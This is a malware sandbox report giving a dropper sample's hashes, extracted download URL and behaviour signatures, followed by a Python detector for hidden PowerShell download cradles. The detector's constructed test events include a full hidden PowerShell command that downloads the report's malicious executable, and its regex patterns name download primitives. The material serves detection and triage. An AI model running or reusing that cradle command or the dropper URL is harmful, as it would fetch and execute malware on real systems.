General

  • Target

    5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118

  • Size

    128KB

  • Sample

    240720-acxtcsxbnn

  • MD5

    5e40ff4f7d71c5d7f15f3658f7f0f3e8

  • SHA1

    dc0283bad8ea311041775a709f328099faa5ae91

  • SHA256

    caf470ee82450f8c4735002e31f671acf1b6ee335658ef96117f2970645e0f40

  • SHA512

    d037af5ce9126edfa99050b118636f9366cec5e334c78fde0f6ce88f976771fd288c1af3f53fedec44095b6dafe13ce146eb7ce53c5504365c4ec5b4bde98427

  • SSDEEP

    1536:IHnYdmIa+w84pvAQUcTKB+KRUWie6Moq1QLhSr+gMY:IqmImpvXKwzWEsSLwrXMY

Malware Config

Extracted

  • Language

    ps1

  • Source

    exe.dropper

  • URLs

    http://fast-cargo.com/PAYMENT_details.exe

Targets

    • Target

      5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell was launched with its display window hidden (a `-WindowStyle Hidden` style argument), a common way to keep a download cradle out of the user's sight.
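As an added triage example, not part of this sandbox report: the script below runs a small detector over constructed process-creation events (field names modelled on Sysmon event ID 1, an assumption of the example) and flags the three behaviours the signatures above describe: a script interpreter spawned by an unexpected parent, PowerShell started with a hidden window, and a download cradle fetching a URL. It also matches events against the indicators the report does give (the extracted dropper URL from Malware Config and the sample SHA256 from General). The list of "unexpected" parents, and the assumption that the report's sample is the document that spawned PowerShell, are choices of this example rather than facts from the report.

```python
"""Added triage helper (not from the sandbox report): flags the behaviours the
report's signatures describe and matches events against its indicators."""
import re
from urllib.parse import urlparse

# Indicators copied from the report above.
DROPPER_URL = "http://fast-cargo.com/PAYMENT_details.exe"
SAMPLE_SHA256 = "caf470ee82450f8c4735002e31f671acf1b6ee335658ef96117f2970645e0f40"

# Assumption of this example: parents that should not normally launch a
# script interpreter in this environment. Tune to your estate.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "mshta.exe", "wscript.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# -w / -win / -window / -windowstyle hidden, any case.
HIDDEN_RE = re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.IGNORECASE)
# Common PowerShell download-cradle primitives.
CRADLE_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|"
                       r"Start-BitsTransfer|Net\.WebClient", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(event):
    """Return the list of findings for one process-creation event.

    Expected keys: pid, parent_image, image, command_line, sha256.
    """
    findings = []
    parent = basename(event.get("parent_image", ""))
    image = basename(event.get("image", ""))
    cmd = event.get("command_line", "")

    if image in SCRIPT_HOSTS and parent in SUSPICIOUS_PARENTS:
        findings.append(f"unexpected child: {parent} -> {image}")
    if image in {"powershell.exe", "pwsh.exe"} and HIDDEN_RE.search(cmd):
        findings.append("powershell hidden window")
    if CRADLE_RE.search(cmd):
        findings.append("download cradle")
    for url in URL_RE.findall(cmd):
        if url.lower() == DROPPER_URL.lower():
            findings.append(f"known dropper URL: {url}")
        elif urlparse(url).hostname == urlparse(DROPPER_URL).hostname:
            findings.append(f"known dropper host: {urlparse(url).hostname}")
    if event.get("sha256", "").lower() == SAMPLE_SHA256:
        findings.append("known sample hash")
    return findings


def triage(events):
    """Map pid -> findings for every event that produced at least one."""
    hits = {}
    for event in events:
        found = analyse_event(event)
        if found:
            hits[event["pid"]] = found
    return hits


# Constructed events for demonstration; the chain (document -> hidden
# PowerShell -> dropped exe) is assumed, not taken from the report.
SAMPLE_EVENTS = [
    {"pid": 1,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": '"WINWORD.EXE" /n "PAYMENT_details.doc"',
     "sha256": SAMPLE_SHA256},          # assumption: the sample is the document
    {"pid": 2,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": ("powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                      ".DownloadFile('http://fast-cargo.com/PAYMENT_details.exe', "
                      "$env:TEMP + '\\p.exe')\""),
     "sha256": "0" * 64},               # constructed placeholder hash
    {"pid": 3,
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\user\AppData\Local\Temp\p.exe",
     "command_line": r"C:\Users\user\AppData\Local\Temp\p.exe",
     "sha256": "1" * 64},               # constructed placeholder hash
]

if __name__ == "__main__":
    for pid, findings in triage(SAMPLE_EVENTS).items():
        print(pid, findings)
```

Event 2 trips all three behavioural checks plus the URL match, event 1 matches only on hash, and the dropped `p.exe` (event 3) produces nothing on its own, which is exactly why the sandbox's "unexpected child process" and "blocklisted process makes network request" signatures sit on the parent chain rather than on the payload.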

MITRE ATT&CK Enterprise v15
